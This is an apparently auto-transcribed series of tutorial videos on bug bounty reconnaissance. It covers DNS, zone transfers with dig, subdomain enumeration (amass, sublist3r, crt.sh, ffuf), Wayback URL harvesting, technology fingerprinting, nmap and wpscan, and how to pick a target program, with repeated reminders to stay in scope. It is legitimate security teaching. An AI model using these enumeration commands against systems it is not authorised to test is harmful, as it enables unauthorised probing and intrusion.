basic you can fuzz this right here the subdomain and the most popular subdomain fuzzer that I can think of is W fuzz I'm sure you can use other fuzzers but W fuzz is one that seems to work really well for me when I'm doing a sub domain fuzzing and then right here is when we start to run into the the path or the location to the contents is how I have it labeled here but I usually think of this as a directory this is a directory and then eventually you're going to hit a actual page and you can actually delete some of these and you could just go to blog and see what's there but this is the path of the location of the page now here comes kind of the good part for us to look at and before we move on you can actually fuzz for different directories right here the same way you would fuzz for subdomains and look for different directories within the subdomain or domain and now when we move on to right here the question mark what you need to remember about the question mark within the URL is that it signifies a query and a parameter is about to be dropped in and this is where we can start messing with the URL to see what information we can pull back from the server so you can try you can try and look for an lfi an RFI and ssrf and actually right back here you can look for directory traversals but you have a parameter usually it'll be labeled usually it'll be labeled as something other than parameter one of the ones that automatically throw up a red flag for me is when I see a parameter that says URL and then this query you're going to look to see if this is querying the actual server itself and if it is you can start to look for a server-side request forgery or something along those lines but let's say this just has like an ID right here of 42 and you can go ahead and start changing this 42 to other numbers and see what information you can come back and maybe see if you can access some information that you're not supposed to so this is a URL and one of the reasons I wanted to show you this is because when you're in your recon phase and you're not yet testing to remember to save URLs that look really interesting to you with different parts that you're able to change or fuzz that you think might pull back some information that you should not have access to in this video we're going to talk about how the DNS works or the domain name server so if you decide you want to type in something like google.com how does your browser know where to go and find the Google ipg address to resolve the web page to you so I Googled how DNS works and had to go through a few pages before I found something that was actually good for an example and I thought this was a really good example so we're going to go ahead and walk through it so you have a person right here who types in a domain right here and they type in dnssimple.com and it will check the web browser's cache which you will see right here on your local machine to see if you have visited this page before so if you ever go to facebook.com and you're logged in in the future next time you go to facebook.com it automatically logs you in because you have stored your session and cookies in your cache on your actual browser so it will automatically log you in but if you log into facebook.com using Firefox and then you go to a chrome and you try to log into facebook.com you're gonna have to re-authenticate because it doesn't have that stored in your browser cache so the first place when you type in a web address it is going to go to the web browser to see if it's stored in the cache and before we move on here you can see right here google.com they have an IP address for that the reason you have actual domain names attached to IP addresses is because it's easier for us to remember a domain name such as Facebook rather than a string of numbers for facebook.com or a bunch of other web apps we just remember we need Google we don't need to remember this string of numbers right here so the purpose of a domain name is to give you an easy way to remember the contents of a specific IP address which is going to resolve to either Google or Facebook or Wikipedia as you see right here so that is the purpose of the domain name so after your browser tries to gather the information and it's not able to we can go to the next page and it shows the packets moving out to the ISP server which is going to be your internet service provider which we're told right here and it's going to ask how do we find this website and it is going to tell us that the root server knows where to find the location for the.com TDL and we've talked about the TDL before it is the top level domain which can be a dot com.org.edu dot UK dot FR and many others so those will be the top level domain servers and it's going to tell you to go out to the root server and the root server is going to give the information back for which TDL server you are looking for that's going to contain the information you want so if you want the.com a TDL or if you want the dot org TDL and the root server is going to pass the information on to the next server inline to give you the information so here we are at the root server and our packets are going to make the request and we're going to be told that it doesn't know where to find DNS simple.com but it's going to be able to tell us where the the TLD is located and it's going to ascend us on our way so you can see here is root and here are the tlds and it's going to send us to the right one so before we move on too far if you're wondering how this would work with say something like the Tor Browser my understanding of how the Tor Browser works is that it's going to encrypt all of your data so that the ISP isn't actually able to track the web application that you are trying to reach and the Tor Network opens up a bunch of nodes for your encrypted data and it doesn't actually go through this process until actually until after it has reached the exit node and that is how your ISP your internet service provider is not actually able to track where you are sending your requests to and the same thing would work with a VPN as well so on to the next page and it gives a little bit of a history that we don't really care about on the tlds and finally we make it to the.com TLD and it's going to say here is the name server one and the name server 2 name server 3 and name server four I'm not actually positive but I think all domains will have four name servers so if you host with cloudflare or Google domains or and I'm pretty sure with any other hosting companies you're going to have this in S1 and S2 and you're going to see this when you're actually setting up your domain to resolve to a specific IP address so it's going to send you to the name server at this point and you get sent on your way to the next page and here you make it to the ns1 and then S1 it says I can give you the IP address and then you get the IP address and you're able to resolve to that specific IP address that you create period in the beginning such as google.com so I hope this made sense if not you can watch it again or you can read through this you can see the URL is right here for you to go to or you can Google around and read maybe something else explains to you how DNS works if this was too confusing and if not you don't necessarily need to know all of this information to move on into the world of ethical hacking but I thought it'd be helpful for you to understand how the web works all right in this video we're going to cover a tool that is called dig and it will check for Zone transfers you're going to hear about Zone transfers it is a great way to find additional subdomains you can use fluff and go Buster and W fuzz and try and Brute Force for subdomains and use sublister but you can also use dig it's really quick and if there are any subdomains it's really helpful tool because you'll find them right away so a DNS Zone transfer is supposed to replicate a DNS database between DNS servers which means if it is vulnerable to a Zone transfer it will give us information like subdomains and some other information which we'll see in just a second so we'll go ahead and run this I have opened up the box friendzone from hack the Box because it is vulnerable to a Zone transfer and if you find a bug mining program that's vulnerable to a Zone transfer you're not actually able to exploit it and hack per se the web application but when you find a Zone transfer and something is vulnerable to a Zone transfer you'll you can report it as information disclosure because it's something that should not be open to the world so the easy way to test this is with a tool called dig and we'll just type in dig so we'll go dig a xfr and then we will say at and then we're going to use the IP address and then we'll use friend zone because that is the domain that we are after dot red and then we can run this and see what it spits out for us we have friend zone friend zone friend zone and administrator one so this would be something that would be worth checking out we have this HR we have an uploads which would also be something worth checking out if you're doing a CTF or if you find this information out in the wild and so you can actually save all of this into an out file and we'll just call it Zone just like this and then from other Recon that is done on this box you also find a another domain called friend zone portal just like this and we can run it and we find admin files Imports VPN and you have all of these files as well and so if you double carry it it will just append to our file so if we cat out Zone we have all of this information and now if you have taken my little bash course you know that we can cat out the Zone and we can go like this and we can say grep friend zone and make sure that works and so It'll point out it'll give us all everywhere that friend zone is located and then we can say grep in and then we want to awk for our cut and go ahead and put in our curly braces and quotes and we can say print dollar sign one because we only want what is at the front of this file and then we will see what happens yep that's what I thought was going to happen it gives us what we want and then we can say sort Dash U and this should get rid of our replications right here and it does it sorts it out for us and we get rid of a lot of the repeats and now you have this nice little happy file with just the sub domains that we have pulled down from the Zone transfer so Zone transfer is something you should always look at and if you're in a hack the Box you might have to add more of these to your Etsy host file but out in the wild these would be really good targets to go ahead and try to attack and find exploits on so this is the Zone transfer with the Dig tool you'll want to remember it whenever you see a port 53 that is open that is the port that is used for a Zone transfer so a few things to remember about this specific tool if you run an in-map scan Port 53 if it's open you can always try for a Zone transfer and see if you can pull down additional subdomains it's a great place to grab subdomains you can also report it as information disclosure if you are actually able to pull off a Zone transfer so with that we will move on to the next tool all right I want to cover two more tools that are Recon tools that you're going to hear about but I don't really use a whole lot because I don't think I get a whole lot of helpful information from but you're gonna see these in pretty much every penetration testing textbook every certification course you ever come in contact with and they are who is and nslookup will you do NS look up real quick because it doesn't give us back a whole lot of information so we can just type in NS lookup just like this and then you can do something like www.google.com and it's going to tell you their IP address the domain name you're going to get the IPv6 name back and it's going through Port 53 and so this is a tool you would run if you see Port 53 open same as dig and you can get just a little bit of information back with NS lookup so you'll hear about this and you will definitely see it in the future this is what it does but then there's another one that you're going to hear about and see regularly and it's who is and so if you type in who is google.com you're going to get back a whole bunch of information and if you're ever doing like a penetration test this is actually a good one to run because sometimes you can get back email addresses and a phone number and things like that about the company but you can find out a little bit more about the company so right here you see they're using the Google domain servers right here which isn't that surprising being from Google but if you look at this right here who is Google registered with it's not even registered with the Google domains which is kind of ironic that Google is not does not have their own domain name registered with themselves I'm guessing they must trust this Mark monitor more with security than they trust themselves which I mean is saying something I think Google should probably switch that but anyway if you know why they're using Mark monitor instead of Google domain names then you can feel free to let me know in the comments maybe they're just using it just because they've never changed it once Google domains came out anyway this is who is and it just tells you more information about the domain name and where it's registered and the kind of the security behind it and who's running it and you can look up to see if there's any vulnerabilities or anything like that you're probably not going to find a whole lot from who is other than just about the domain name where it's registered who's it registered with an IP address and basic information like that so these are two tools that you're going to hear about for sure in the future and would be worth remembering but I don't use them all that much because I don't find them to be that helpful I wanted to let you know about them because you will see them and hear about them in the future and now you know what they are and what they do a another tool that would be worth your time investigating is the Harvester it looks like this and the this tool will go out and look for other domains and subdomains and it'll also find email addresses if you're a penetration tester for you to try and Target and the usage is really pretty simple you just type in the Harvester and then you would pass in a domain with the Dash D and then you can pass in the source that you want to look for something so you would just use domain dot com and then let's say we wanted to use Google you can put in a dash B and then google.com or any of these other options down here for the source and it will go out and it will try to look for domains and it will scrape all these search engines for subdomains email addresses and things of that nature so the Harvester is a penetration testing tool that you're going to hear about from time to time and it's one to be aware of and know that it exists you're probably not going to use it in any pursuit of certifications or ctfs but it is a really great Recon tool and one you should know about and be aware of going to be looking at cert sh I've gone ahead and pulled it up here this is actually the second time shooting this video because I forgot to press record the first time but when all else fails when you're looking for subdomains the assert.sh is going to be a great place to come it's going to give you this sort of education tickets for the domain that you are looking at so we'll go ahead and open this up and I'm going to type in tesla.com and we can hit search and look at the subdomains that it pulls down and you're interested in this middle row right here because if you look at this closely you can see these subdomains right here for tesla.com and so this will give you a bunch of sub domains for you to go out and look and test for bugs and see if there's any information out there or anything you want to attest against when I look at something like this one of the first things when you have so many subdomains is to see which ones look specifically interesting to you and then you can go and check those but always make sure that they are in scope so you'd want to make sure that this assets first of all is owned by tesla.com and then you'd want to make sure that it's in scope and a second a tip is to look for the Dev typically these Dev sites and these Dev subdomains right here are going to be hosting information or new software or new code before it goes live on the actual main domain and so these devs are always something good to look at another one that's good to look at is look at like admin portals and see if you can get into any of those or fuzz for directories because there might be something there that you might need authentic authentication for in order to see but you can access it without being authenticated so the devs the admins Pages like those this API would be interesting to look at and so you can come in and look at all these subdomains if amass and sublister are not pulling back enough subdomains for you you can always come to srt.sh and check this out so in this video what I think we're going to do is I'm going to show you how to grab all of the different possible URL targets for you within a bug Bounty program and then we're going to start to narrow it down to the URL that are actually responsive and then the ones that I think will be helpful for you to Target as a beginner and so I'm going to show you how to find the most obscure URLs within a bug binding programs for you to Target but always make sure to remember that these URLs are in a scope that's going to be really important so always check that because sometimes you'll see URLs that maybe are several years old and a specific bug bunny program has forgotten to remove them and you're going to think this is a really great Target but it will end up falling into the category of out of scope so make sure as you go through your recon phase to only target URLs that are in the bug binding scope this is something that I really struggled with in the beginning I would end up out of scope so you don't want to do that all right there is something called the Wayback machine which is really cool and we're going to be utilizing this and thanks to Tom nom nom for making a way back tool that is really going to save us some time as well as a couple of other tools so if you want to check this out online you can type way back into Google and and you'll be brought to the Wayback machine and we can come right in here and it tells us at the top that it has saved more than 737 billion web pages and let's go ahead and check out what this does so we can type in yahoo.com and it's going to give us all of the screenshots that it has taken of yahoo.com from October 17 1996 so this is why it's called the Wayback machine and it doesn't just take screenshots it'll actually store the URLs and you can go back and check out the timestamps and it'll show you what the web page actually looked like at that time so if we click back here to the year 2000 and let's say we want to open up a February 29th 2000 we can do this so we'll right click say open in a new tab and it's going to render what that page looked like for us from its archive which is pretty cool and so this is what the main page looks like and some of the HTML might not render quite right but that's okay so we just really want to grab the UR l and a lot of the links that were available at that time just in case they are still being hosted on our specific Target and they have not removed them which does happen programs and companies will be hosting up specific subdomains and then after a while that subdomain is no longer in use and this is really common with with blogs on large companies say PlayStation comes out with a new video game they'll create a subdomain all about that video game and then they will forget about that video game and years pass by and that subdomain will still be up and it won't be updated and it might be vulnerable to new exploits and cves and so that's why we want to look back into in the past and see if we can grab any subdomains or URLs or links that may lead us to bugs that other people have not checked for within those forgotten subdomains and links so this is the Wayback machine you can come in here and get a feel for how it works and now we're going to go ahead and install the Wayback tool by Tom Nom Nom so what you will do is come to Google and you're just going to type in way back Tom Nom Nom and it's going to be the first tool here for us and we're actually going to have to install the go language before we're able to install this so what you can do is open up a terminal and come in here and just type in go and if it doesn't turn green then you do not have the go language installed so what we're going to need to do is run a sudo apt update just like this and let this update and if yours it doesn't update or gives you some kind of warning you might have to run a sudo apt upgrade and then run the sudo app update so now that we're all updated we can run sudo app install go Lang like this and we'll say yes and now if we type in go it should turn blue for us or some other color meaning that we have the go language installed so we can come back to the Tom Nom Nom site and we can just highlight this and it's gonna and we can just copy this right here and it's actually going to install the tool for us and I think it installs it in in the directory Go slash bin so I'll show you that in just a second we can paste this in and I think we're gonna have to run this as a pseudo okay so when I ran it with sudo it didn't work for me so when it actually installs the proper way it's going to run just like this and you're going to see nothing in the output and then what you're going to want to do is CD over to the go bin and it's going to look like this then you'll hit enter and you're going to automatically come into the directory like this and then if you LS you're going to see the Wayback URLs within the file here and the way we're going to run this is with this dot slash and then the name of the tool that we want to run and just so you can see what it looks like you can run a dash H and see the output here okay yeah so my other VM him was freezing so I went ahead and opened up a new one which is just fine it will all work the same so I went ahead and installed it on this new machine and you're going to find it in the go bin and so if I run an LS you're going to see I actually have a couple other tools in here but I'm going to show you how to install those in just a second but this is the tool you just installed right here so the way we're going to run it is really simple but first we need to create a Target domain for us we're going to G edit and I'm going to get it yahoo Dot txt and we can just type in yahoo.com and this is going to be our domain that we Target and if there's any subdomains in here you'd want to paste in like a sub.yahoo.com and I'm going to show you how to grab these subdomains here in just a second so we're going to leave it just like this we will save and now we can run the Wayback URLs tool and while it runs I'll show you how to grab the subdomains so what we'll do is cat that file that we just made and we're going to run it into the Wayback URLs just like this and then you can actually save all those into an out file by pointing it over to the file you would like to call it so we'll call it yahoo dot urls and we'll let this run and now while that runs we're going to go ahead and grab some subdomains so we're going to run an amass enum Dash passive Dash D yahoo.com and this might take a second and it's going to give us a ton of sub domains that we would want to run the Wayback tool on and so our goal is to find really old pages on these subdomains from the way back tool that are going to have some vulnerabilities so we'll go ahead and close out of this and what we're going to end up doing is just grabbing like 10 of these because I don't really want to run the Wayback tool on all of these you would run it on these if you were actually looking for any vulnerabilities Within These pages but my goal is just to showcase the tool for you so we will copy some of these URLs and come back over here and this is still running so oh it just finished so what we'll do is now we can G edit our yahoo.txt like this and what you would do is you would run all of these subdomains in a file just like this so you might want to save this a mouse right here into an out file so that you don't have to copy and paste but that's okay that we're not going to do that and we're going to save this and now if we ran it it would run and grab the valid URLs for all of these domain all of these subdomains for yahoo.com so now that we have that saved what you would do is you would run this the exact same way you did right here and it would run this way back tool on all of those subdomains that we just put in that file and it would save them over here in the URLs for us so what I want to show you is if we run a word count right here on this yahoo.txt it's going to show us uh that's the file that we made so we'd want to run it on the URLs and it'll show us that we have more than 128 000 valid responses from the Wayback tool and we don't necessarily want to visit all of these 100 128 000 URLs and if we ran the Wayback tool with all of these subdomains I bet we would have well over a million different URLs and we don't really want to check all of those so now we want to see which one's resolve in order for us to know which ones to Target so what we would do at this point is you're going to run a sudo app install HTTP probe and it's going to look like this I already have it installed so you can go ahead and run it and then after you run it you can type in HTTP probe to make sure that it's installed and it should turn blue for you just like this and the way we run it is the same way we would run the way back just like this so we're going to go ahead and cut out our Yahoo URLs just like this and I'm going to actually delete the valid URLs and you can save it into an out file if you want I'm not going to I'm just going to let it spit out to the console and then cancel it and so we would go ahead and run this and I think this is URLs with an S like that and it's going to go ahead and start running this all of those 128 000 URLs that we pulled down from up here and it's going to start printing the valid ones out down here in the terminal for us I'm going to go ahead and cancel that the valid URLs are going to get printed out just like this into the terminal or you could save them into an out file and then once you have the valid URLs you can start to look through which ones you think are juicy and you want to Target one other thing I want to show you is if we type in our HTTP robe just like this it'll be run a Das H just like this you can start to see if you want to give them a timeout in milliseconds so I think there's a thousand milliseconds in a second so if you wanted to run an HTTP probe and you didn't actually want to wait for it to try and resolve each one for the default of 10 seconds which is kind of a long time you could change this and see if the web URL resolves in like a second that's probably what I would do so I would run on a dash T and I would say 1000 instead of ten thousand so that way it only takes a second before it moves on to the next URL so if it went to this URL and it didn't resolve by default it's going to wait 10 seconds to go to the next URL and if you're running over a million subdomains that's going to take forever especially because a lot of them are really old and are not going to resolve so I would run it with a thousand set away to one second so if this did not resolve within a second it's going to go ahead and go to the next one so this is one of the most comprehensive ways to pull down the max number of URLs for you to Target within a bug Bounty program in this video I'm going to show you how to find the subdomains which are going to be really important for you if you do any kind of bug mounting hunting or penetration testing because subdomains are usually targeted at the least and usually what happens is beginners just log into the main page and try and hack on the main page and it doesn't really work out for them and they become really frustrated so let's go ahead and jump into it okay so here we are we have opened up a terminal and you're going to go ahead and pseudo apt update and then you're going to type in sudo apt install sublister I just want to show you sublister because it's really popular and I used to use it a lot but I've really stopped recently because it's not pulling down as many domains as I would like so if we just type in something like sublister and then yahoo.com we'll see what it pulls down so you'll type in sublister Dash D for the domain actually we can type in a dash H for help and you can see what all it's able to do so we're going to type in a sublister Dash D and then we'll just type in yahoo.com and it's going to go out and search all these different search engines and then bring back the results and remember when you see all of these subdomains that it brings back that you need to check to make sure they're in scope sometimes I'll show you what I do is I just open this up and I'll be like okay here's a subdomain here's a subdomain and let's go through these subdomains and I'll show you what I think is the best way to do this so if you're in Firefox you're going to want to download something called open list list plugin and we want it on Firefox so we'll just go ahead and add this and it's telling you right here what this is going to do it's going to open multiple URLs at a time which becomes really helpful for us it says we want to add we're okay with adding and here it is so we now have this right here and what open list does is when you have all these subdomains and you want to see what happens you can just copy these and then you can paste them in so we'll just grab this one because I don't think it's going to have anything on it so we'll copy this one we can come over to open list and we can just paste in a bunch of URLs so what we would do is you'd really just copy a bunch of these instead of the same one over and over and then when you hit open URLs it's going to open all of these tabs for you it's going to be a lot faster than having to open one at a time so here they are it opened all those for us so that's one way to check out the subdomains you do find but that's not the purpose of this video that was kind of just an afterthought that popped in my head as we were shooting this video so you have a sub Lister and here's a list of subdomains that it's brought down and you might be able to say well that's a that's a decent sized list so we'll scroll through it here it's fine but it's it's not as big as we would like so one of the tools I've been using here recently is amass and you can just type in amass H and you can see exactly what it does and it's going to tell you it's an in-depth attack surface mapping and asset directory a mass is really cool if you can get it to work so sometimes amass can be a little bit finicky but it'll work for for us for what we're about to do you just type in a mass and then we want to use enum because we're going to do enumeration right here and then if you hit a dash if you just hit enter with amass enum it'll tell you everything you can do with the enumeration and we're actually going to scroll up and we're going to run a Dash D and we're just going to give it a domain and sometimes I like to run a dash IP to grab the IP addresses for the discovered names which can be really helpful so we're just going to run amass enum D and then we'll just run yahoo.com actually now that I see this is running and it's actually taking a little while let's go ahead and close out of this I want to run an a mass enumeration and I want to run a dash passive and then the domain right here and then run this and this should run a little bit faster than what we did have going okay so amass is still running but I want to show you look at all of these subdomains that it has pulled down for us this is going to be way more it's so many that my terminal is actually lagging so we'll go ahead and close out of this so that the way it stops and if we just scroll through here look at all of these subdomains this has way more subdomains than we had with sublister it is an insane amount so all of these subdomains you'll want to check to make sure that they're in scope but look at all these yahoos like this is a crazy attack surface if you can find a program that has a really wide scope then you will then most of the subdomains you find will be in scope but make sure to always check I can't believe I'm still scrolling there has got to be like nearly a thousand subdomains right there so amass is something you'll want to check out I love amass enume and then I run the passive because I think it runs a little faster and then Yahoo in this video I'm going to show you some cool Recon tools that are going to be able to help you figure out what kind of technology is running on a specific website that you may be trying to Target and an easy way to find out some version numbers and search for vulnerabilities this can be really helpful for you to know what is being used and what technologies are running on a specific website so that way you know what kind of attacks you should be looking for so with that let's go ahead and jump into it alright so here we are at tenet.hdb this is a box from hack the box I decided to use this because if there was something vulnerable on a live web application I didn't want to accidentally show any information so a few ways to find out what tech stack is being used is with a tool called wapalizer and it is right here I already have the extension installed and you just come up here and you can click this extension and it'll show you what it is running so you're running WordPress A 5.6 so to Google and type in WordPress 5.6 and then you can type in exploit or vulnerability and just read to it see if there are any vulnerabilities or anything that needs to be patched with this specific vulnerability sometimes inside of here you'll see something like this database this is really helpful for targeting SQL injection so you have a mySQL database so if you find any places for any inputs which I'm not sure if there are or not you can try to pull off some kind of a SQL injection the appalyzer tool is really helpful in giving you the programming language so if we're on a web application and we are testing it if there is something like the programming language of PHP there are some very specific ways to go about manipulating PHP or checking for PHP type juggling there's different things you can do knowing just the programming language and then something like this right here we have the web server is Apache and you can do the same thing we did with the WordPress 5.6 and we can go out and see if there's any vulnerabilities here that maybe have not been patched for this specific website so appalyzer is a really great way to find out what kind of Technology a web application is running and so if you wanted to install this you can just go to Google type in wapalyzer and you can type in wapa laser and we want I'm on Firefox you might be on Chrome and we can do Firefox and then here's the extension and you can just come over here instead of remove you will click install and the second one I want to show you is the react developer tools this is a really cool extension it will be right here and whenever you're using something that's using the react framework it will light up for you so I went ahead and opened up Instagram and you can see it light up blue right here and it'll tell you this page is using the production build of react and so we know Instagram is using react and there's actually a lot of popular websites that use reacts such as ubereats Discord Instagram Skype Pinterest and many others so knowing what is running such as react you're going to know that there's JavaScript and then there are a lot of common Frameworks that are used within react and you can Google those we're not going to go into those in too much detail and then one of my favorite websites is right here the W3 text this is going to do something very similar to wapalyzer so right here you can just enter a specific URL and it's going to tell you what is being used very similar to waplizer so if we just type in yahoo.com it will pull back for us all of the technology that is being used so it says it has some server-side programming with Java JavaScript jQuery so you have this really old library right here and it tells you there is a newer version and so there's a lot of information in here and if you have any questions about something like JavaScript you can click on it and it'll tell you what JavaScript is or jQuery and how it is used so there is one other way to kind of find out what kind of a tech stack is being used so if you come in here and you have apple laser and we look at this we can also come in and try to figure out what is being used within the JavaScript sometimes you'll be able to see comments or be able to work out what is being used on the website by coming in here and clicking on the debugger right here and it'll tell you here is the JS and we have the JavaScript and then you can click the pretty print down at the bottom and you can look through this JavaScript and see what you are able to find inside of here so these are some of the common ways to find out what technologies are being used on websites they can be really helpful for you to know what's going on and exactly how to attack a website and these can be really helpful for you in your recon phase and maybe even lead you to some kind of vulnerabilities just because you have a version number given to you okay so now I want to show you the tool and map and if you followed my channel for any length of time you're familiar with the tool in map but I want to show you how I like to run this tool and the information I like to look at and pull back from my my targets so nmap is a port scanner and if we run in map Dash H it's going to spit out for us all of the things that we can do with nmap one of my favorite things to do is run the dash V with a dash a this is going to tell us about the open ports as they come back and this is going to give us all the information so it's going to tell us right here enable OS detection it's going to do script scanning and it's going to look for different versions as well so we can go ahead and type in an nmap Dash a and usually you would run a dash p dash if you're doing like some kind of CTF but if you were doing a bug Bonnie program and you're not wanting to knock on the doors of all the ports you would just run the specific ports that you would like to see if they are open and so I've gone ahead and opened up a hack the box and so if we run this this is what it's going to look like and the dash V is going to give us back the ports as it finds them so it says a 480 is open and it has finished and tells us about the open ports and one thing to know about hack the box is it says it did not follow the redirect so it went out to see if Port 80 was open we were redirected to academy.htb and if I actually wanted to open that up and I keep getting this not found right here that is because I need to add this to my Etsy host file but we're not going to do that right now that's not the point of the video and we are told we have the Apache version and it tells us our methods and it gives us these ports are open as well so this is how I like to run in map and so we will continue on there is a one last way to search for subdomains and directories that I think will be helpful for you to know specifically subdomains we've seen this before dealing with directories but we're going to use the tool fuff and this is the syntax that we're going to use we're going to go ahead and fuzz for subdomains on yahoo.com so the tool is pretty simple to use we just type in fluff the URL which is going to be right here and the location that we want to fuzz which is for subdomains before yahoo.com and this is going to a Brute Force for us any subdomains that come back with the status code 200 and then we're going to use our word list which is right here and then we're going to use a Slowdown of one second so we can go ahead and run this and you should be able to see subdomains start spitting out as it finds them and here are a few different subdomains and I want to just we'll stop this right here I want to show you so we got this 301 which I believe is going to be a redirect but we have different sizes different word sizes so you might want to go and check these out anyway but just in case we didn't want to see these 301s what we can do is I think it is a dash FC and we can say 301 and now it won't show us any of those 301s sometimes that comes in handy when you are fuzzing and you keep getting 401 or 403 and we really don't want to see those and so you can see here are some 200s so if we wanted to we could go out and look for these subdomains and see if any of them look interesting to us now I have mentioned this before you can also fuzz for directories and you can use the fuzz like this and this location and now if we run it it's going to look for directories and lastly one thing I also want to mention is when you are fuzzing for apis fuff is also a really great tool for this so we'll go ahead and delete this and if we were going to be looking for let's say there's an API that looks like this api.yahoo.com and we wanted to fuzz for valid endpoints and see what we could find we would just go ahead and run fluff like this and look for endpoints and then go out to the web page if we are able to and look at the Json if not I have a tool that will fuzz apis for us and actually give us the Json right here in our terminal and you can go check that video out I'll link it in the description if you would like to build that tool it'll save you some time having to go out and look at the Json itself and it'll just print it right here in the terminal for you so with that that is fuff and how we fuzz for subdomains and directories all right so it is always good to have a couple of tools in your tool belt so you can go ahead and run derb like this and we can run a yahoo.com and we don't really need any more than just this right here so it's just an HTTP s and then we'll run yahoo.com and it'll automatically start fuzzing for us just like that it's really simple to use so sometimes fuff might give you some errors or it's not working quite right and it's always good to know of other tools one of the cool things about derb is you can run it recursively it's so once it runs all the way through your word list and it let's say it found yahoo.com football the next time it runs it'll run yahoo.com football and then it will look for more directories within that football directory which is really cool so derb is also a backup fuzzer just in case fuff isn't working for you another helpful tool that you're going to use especially inside of ctfs is a WP scan and you're going to use this with WordPress sites so I've gone ahead and opened up hack the box and I have a tenant running here and if you have a hack the box subscription and you're wanting to follow along you will need to add tenant.htb to your Etsy host to file which I have already done so the wp scan tool is going to go out and look at all of the plugins on the WordPress site and see if any of them are vulnerable if any of them are out of date it's going to check the actual theme and see how old it is and how long it's been since it's had updates and we can go ahead and check out WordPress scan right here the wp scan Dash help and it will tell us all of the different flags and everything that we are able to use and one thing that I can never remember what it actually looks like is this right here is the dash dash plug-in detection so what we will do is we'll type in WP scan dash dash URL HTTP slash and then we're going to go tenant.htb and then this Dash e right here is going to tell it that we want to check all of the plugins I sometimes call it all ports out of habit but I think it's all plugins we can actually just look if we scroll up we're going to enumerate all plugins right here and we want to use the dash dash and then we want plugins Dash detection and then we want to use aggressive and then you can do a dash o if you want to save this in an in a file I pretty much never do that I'll just open a new tab and come back sometimes I'll have a whole bunch of tabs open up here and it's not always that helpful so it will flag things like this and tell you that a version is out of date and I told you this in the last video but I especially am really bad with WP scan because you get a lot of information but you should read all the way through all of this I remember doing a CTF about six months ago and I ran a WP scan and I just like skimmed through it and I ended up missing a vulnerability that gave me a remote code execution and I wasted several hours of my time enumerating when I should have just read the entire scan so make sure you read the entire scan when you run one it might take you a little bit of extra time but it will always be worth it because it will give you information even if you think it might not be helpful like right here it doesn't flag this but it might be worth going out and checking this version 5.6 it's insecure on this specific release and you can go and check this these different version numbers and this might take a little while because we're running the aggressive but that is okay so this is a WP scan you're going to want to run this whenever you come across WordPress web applications it is going to be your friend you're going to use it regularly throughout your penetration testing career especially in the world of ctfs and always remember read the output in this video we're going to cover how to choose a bug Bounty program for you to attack one of the first things you have to do is figure out a Target that you want to start doing your recon on and sometimes people can become Paralyzed by analyzing all the different targets and trying to figure out which one they want to attack first and so I want to try and help you figure out how to narrow down your options and then specifically choose one and then start your recon process with so before we jump into this too far I kind of wanted to give you a little bit of encouragement and I'm not really a Star Wars fan but I came across this quote a really long time ago and I found it to be really helpful and it says you want to know the difference between the master and the beginner the master has failed more times than the beginner has even tried and I think this is really helpful when trying to figure out how these top hackers are finding so many bugs and so many other people are struggling it is because they have dedicated a lot of time to specific platforms and to learn this craft and so we just have to keep moving forward every day and you'll be getting better we might get you down you know what you got to do I don't want to know what you got to do just keep swimming just keep swimming just keep swimming swimming what do we do we swim so I decided to add just keep moving forward to a t-shirt recently because it really does show the perseverance that you have to have in the field of cyber security so let's go ahead and take a look at hacker one and narrow down some potential targets and I'm going to show you my process for doing this so let's go ahead and jump into it so here we are on hacker one and one of the first things I like to do is come in to the hackers and then we need to go to the directory so that we can start looking for different programs and now I like to click launch date and I like to sort by the date I want to go from the newest first accidentally clicked it one too many times and I actually believe you have to be logged out of hacker one to have this feature work so if you're logged in go ahead and log out and then you can look through here and then once you have them all sorted out one of my favorite things to do is open them up and look at the scope I like to see how big the scope is and make sure that there is a really large scope because one of my personal and biggest struggles is I will open up a program and I'll get started and then in 20 minutes I find myself out of scope and this can be a problem so I really like to have large Scopes it also means you have a lot larger attack surface and there's going to be a lot more diversity in where different bug bounty hunters have been looking and testing and so you're more likely to find a bug so let's go ahead and scroll through some of these and let's look at some of the Scopes maybe we can look at this link tree I have actually never looked at this but you can scroll down and look to see how large their scope is and it seems like they have a pretty large scope and then you need to make sure you stay away from these specific ones and so make sure when you are searching for a Target that it has a large scope and one of the second things you should search for is something that you're really familiar with so I've noticed that there can be a lot of like currency trading programs on here and I'm not familiar with a lot of the online currency Trading of programs so that's something that I'm going to just avoid but maybe you're into shopping and you're like I want to check out fossil I want to see what kind of scope they have and you can come in here and read about it maybe you're really into gaming and I'm pretty sure here's GameStop there are quite a few game style programs on here and you can go ahead and attack those I'm pretty sure PlayStation is on here GameStop is on here and if you're familiar with those websites already those are going to be something you're going to want to attack because you're going to already know how the web app functions and what should be happening when you click on different links or log in and so pick a program that you personally are familiar with and are already interested in and the sub point to this is pick a program that you're really interested in because you are going to be interested in clicking through the website seeing what's happening what products there are and maybe you'll be interested in looking at the products and it's going to help you figure out how the website functions just because you're going to be a normal user and there's going to be things on the website that you want to look at and click through and check out the functionality but you're also really interested in what they have to sell this is is going to really help in keeping your interest and so pick a program that you're familiar with or one that offers some kind of service that you're really interested in or products that they're selling that you would be a potential buyer of now the reason I told you to sort the programs by date is because the newer the program the less likely they are going to have already been tested by a bunch of different penetration testers or bug bounty hunters and this is really going to help you land a vulnerability before anyone else because the web application just hasn't been picked over as much as the older programs and a another tip to this and is really popular and probably really common knowledge is to choose a program that is unpaid so you can come down to one of these unpaid programs and hack on one of those because the top hackers are going to be going after the programs that offer rewards and financial gain because they're doing this for a living and if you're just trying to get that first bug then you can go for the unpaid programs and then also the newest unpaid program and the last tip is kind of an ocent tip and I think this is really going to help you in your ability to find bugs based on what the developers are posting so go on to all the social medias and follow the developers that work for a specific company so if I was going to come over here to mongodb I'd want to find the developers that work for mongodb on Twitter find their GitHub Pages follow them on any social media that I can because developers will often brag about the different software that they're using and they're implementing into different projects and then lastly they're going to be pushing their new code to GitHub and if you are following them on GitHub you can go and check out the code that they have published before anyone else and see if you can find any vulnerabilities within there or maybe they have pushed some sensitive information to GitHub that they otherwise shouldn't have and so following the developers is going to be really helpful and and one last thing the developers will often do is when they launch a new subdomain or a new area of the web application that wasn't previously launched they'll often post about it and they'll tell you what is going on on that specific page and following the developers is one of my last tips in trying to choose a program if there are a lot of developers that you have the opportunity to follow on a specific program this is going to help you be one of the first ones to find new pages as well as code that is being pushed to GitHub thanks for watching I'm going to be installing a few tools here and it won't take very long but the first thing I want you to install is G edit and I already have installed it just like this so if I hit enter it will pop open this little text pad for me here and I can write information and create files I like to use it instead of Nano or V or vam because it's 